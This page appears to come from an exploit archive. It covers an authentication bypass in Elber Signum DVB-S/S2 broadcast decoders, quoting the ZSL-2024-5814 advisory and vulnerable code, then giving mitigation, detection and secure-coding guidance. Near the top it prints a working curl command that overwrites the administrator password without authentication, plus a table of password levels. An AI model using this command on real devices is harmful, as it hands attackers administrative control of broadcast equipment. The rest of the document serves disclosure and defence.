Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2024-05-04

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
                  1.317 Revision 602
                  1.220 Revision 1250
                  1.220 Revision 1248_1249
                  1.220 Revision 597
                  1.217 Revision 1242
                  1.214 Revision 1023
                  1.193 Revision 924
                  1.175 Revision 873
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, it’s possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.

Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }

--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5814
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php


18.08.2023

--


$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)

Elber Signum DVB-S/S2 IRD (v1.999 and earlier) — Authentication Bypass Overview

The Elber Signum family of DVB-S/S2 IRDs (In-Route Decoders) used in radio broadcast and distribution networks was reported to contain an authentication bypass vulnerability in several firmware revisions. The issue allows unauthenticated actors to modify account credentials through a management interface, potentially granting administrative control over the device and downstream services.

What kind of vulnerability is this?

This is an authentication bypass in the device's web/management interface where a password-management endpoint does not enforce proper access control. In short, the endpoint that handles password updates can be invoked without prior authentication checks, enabling an attacker to overwrite credentials for accounts on the device.

Why this matters

Compromise of administrative credentials enables full device control — configuration changes, firmware updates, service interruption, and persistent access.
Broadcast and transport streams handled by the IRD can be disrupted or manipulated (e.g., audio/data streams, RDS).
Attackers with device access may pivot into operator networks, exfiltrate sensitive configuration or monitoring data, or misuse connected services.
Because the flaw affects password management, it defeats one of the primary defenses for device administration.

Reported scope and affected versions

Vendor	Elber S.r.l.
Product	SIGNUM DVB‑S / S2 IRD for Radio Networks
Affected versions (examples)	1.999 (Revision 1243), 1.317 (Revision 602), 1.220 (Revisions 1250/1248_1249/597), 1.217 (1242), 1.214 (1023), 1.193 (924), 1.175 (873), 1.166 (550)
Advisory	ZSL-2024-5814 (zeroscience.mk)
Reported by	Gjoko “LiquidWorm” Krstic

Root cause (technical summary)

The underlying cause is a missing or insufficient authorization check on a password-management API endpoint. When the server-side handler for password updates fails to validate the requester's session or privileges, it becomes possible to set arbitrary passwords for accounts without authenticating as an authorized user.

Exploitability & Risk Assessment

Exploitability

Exploitation requires access to the device's management interface — typically via its network-accessible HTTP/HTTPS service.
If the management interface is exposed to a wider network (WAN or poorly segmented LAN), the prerequisite access may be trivial for attackers who can reach the device.
The attack is low-complexity: it leverages an unauthenticated API call to change passwords. No privilege escalation or chaining is required once the password is replaced.

Impact

High — an attacker able to change admin-level credentials can fully control the device and its delivered services.
Potential downstream impact to broadcast streams and to any integrated infrastructure (SNMP, monitoring, logging, RDS)

Detection and Indicators of Compromise (IoCs)

Monitoring and detection should focus on unusual or unexpected management-plane activity and changes to account state.

Unexpected password change events or account modification logs originating from non-admin source IPs.
New or unexpected administrative logins following an account change.
Configuration changes or firmware updates performed outside of normal maintenance windows.
Unusual network traffic to the device's management port (HTTP/HTTPS) from external or unrelated internal hosts.

Network-level detection tips

Log and alert on HTTP(S) requests to device management addresses outside allowed management systems (e.g., NMS, operator consoles).
Correlate management requests with authentication events — if a password was changed but no authorized session preceded it, raise an alert.

Mitigation and Remediation

Immediate and medium-term mitigations should be applied until an official vendor patch is available and installed.

Immediate actions (priority)

Isolate affected devices: restrict network access to the management interface to a trusted management VLAN or a jump-host/VPN. Block access from general LAN/WAN.
Restrict access via network firewall rules so only specific management hosts can reach the device.
Change all device passwords via a secure, authenticated channel after applying mitigations, and rotate related credentials.
Enable or enforce secure management protocols (HTTPS, SSH) and disable unencrypted services where possible.

Medium-term and long-term controls

Apply vendor firmware updates as soon as an official fix is released and verified.
Use management plane segregation (dedicated networks or out-of-band management) for broadcast infrastructure devices.
Harden device accounts: remove unused accounts, disable default or shared credentials, enforce strong password policies and two-factor authentication where supported.
Implement monitoring and logging for administrative operations and integrate alerts into SIEM/NOC workflows.
Regularly audit device firmware, configuration, and network exposure as part of your vulnerability management program.

Preventive coding guidance for vendors

For developers of embedded/management web interfaces, the following secure pattern helps prevent similar flaws:

/* Pseudocode: enforce authentication before performing sensitive operations */function handlePasswordChange(request) {
    // Ensure a valid authenticated session and required privilege level
    session = validateSession(request);
    if (!session || !session.hasPrivilege('admin')) {
        return errorResponse(401, "Unauthorized");
    }

    // Validate input and enforce password policy
    newPassword = sanitize(request.body.password);
    if (!meetsPasswordPolicy(newPassword)) {
        return errorResponse(400, "Password policy violation");
    }

    // Perform change and audit
    result = updateUserPassword(request.body.userId, newPassword);
    logAuditEvent(session.user, "password_change", request.body.userId, request.clientIp);
    return successResponse(200, "Password updated");
}

Explanation: This pseudocode demonstrates essential controls — validate the session and privileges, sanitize and validate input, perform the change only after checks, and create an audit log entry. Authentication and authorization must be enforced server-side for any action that alters credentials.

Responsible Disclosure and Vendor Coordination

Best practice for operators who discover such issues is to coordinate with the vendor (Elber S.r.l.) and follow responsible disclosure. Confirm whether a vendor patch exists, and if not, request timelines and mitigations. Maintain documentation of all communications and any compensating controls implemented.

Detection & Response Playbook (summary)

Identify all Signum IRDs on the network and inventory firmware revisions.
Restrict management access immediately (firewall/VLAN/VPN) and monitor for suspicious management traffic.
Rotate administrative passwords using an authenticated process after restricting access.
Collect device logs and review for unauthorized changes; escalate and perform forensic analysis if compromise is suspected.
Apply vendor-provided fixes as soon as available, then harden and monitor ongoing operations.

References and Further Reading

Vendor homepage: https://www.elber.it
Public advisory: ZSL-2024-5814 (zeroscience.mk)
General guidance: secure API design, authentication & authorization best practices, and network segmentation for device management